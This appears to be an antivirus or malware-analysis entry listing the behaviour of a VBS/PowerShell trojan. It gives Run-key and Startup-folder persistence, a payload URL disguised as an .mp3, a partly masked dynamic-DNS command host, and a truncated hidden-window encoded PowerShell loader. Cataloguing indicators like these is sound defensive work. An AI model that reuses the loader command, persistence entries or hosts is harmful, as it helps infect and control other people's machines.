Technical Information
- [<HKCU>\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] 'server' = '%TEMP%\server.vbs'
- %APPDATA%\microsoft\windows\start menu\programs\startup\chrome.vbs
- http://www.4u##.com/uploads/file_2020-02-14_222001.mp3
- %TEMP%\jayna.vbs
- %TEMP%\z1900.exe
- 'bo####51.ddns.net':19811
- http://www.4u##.com/uploads/file_2020-02-14_222001.mp3
- DNS ASK 4u##.com
- DNS ASK bo####51.ddns.net
- '<SYSTEM32>\wscript.exe' "%TEMP%\jayna.vbs"
- '%TEMP%\z1900.exe'
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -noexit -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBq...' (with hidden window)